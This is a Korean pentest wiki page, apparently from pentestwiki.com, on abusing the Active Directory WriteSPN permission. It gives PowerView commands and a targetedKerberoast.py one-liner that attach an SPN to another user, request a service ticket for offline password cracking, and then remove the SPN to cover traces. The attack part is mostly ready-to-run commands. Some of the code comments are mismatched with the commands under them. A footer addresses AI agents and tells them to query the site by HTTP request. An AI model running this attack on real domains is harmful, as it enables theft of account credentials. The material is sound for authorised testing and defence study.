# WriteSPN

대상에 대해 WriteSPN 권한이 있는 경우 공격자는 대상을 주체로 도메인 SPN을 등록할 수 있습니다. SPN 등록 직후 서비스 티켓을 요청하여 커버로스팅 공격을 하고 SPN을 삭제합니다.

{% tabs %}
{% tab title="Windows" %}

<pre class="language-powershell"><code class="lang-powershell"><strong># 권한이 있는 사용자 개체 정보 변수화
</strong>$SecPassword = ConvertTo-SecureString &#x3C;PASS> -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential(contoso.com/user-A, $SecPassword)

<strong># 도메인 객체 정보 저장
</strong>Set-DomainObject -Credential $Cred -Identity user-B -SET @{serviceprincipalname='nonexistent/HTTP'}

<strong># SPN 등록
</strong>Get-DomainSPNTicket -Credential $Cred user-B | fl

<strong># 공격 후 SPN 정리
</strong>Set-DomainObject -Credential $Cred -Identity user-B -Clear &#x3C;SPN>
</code></pre>

{% endtab %}

{% tab title="UNIX" %}

```bash
python3 targetedKerberoast.py -v -d contoso.com -u user-A -p 'Password123!' --request-user user-B --only-abuse
```

{% endtab %}
{% endtabs %}

## References

{% embed url="<https://support.bloodhoundenterprise.io/hc/en-us/articles/17222775975195-WriteSPN>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentestwiki.com/active-directory/dacl/writespn.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.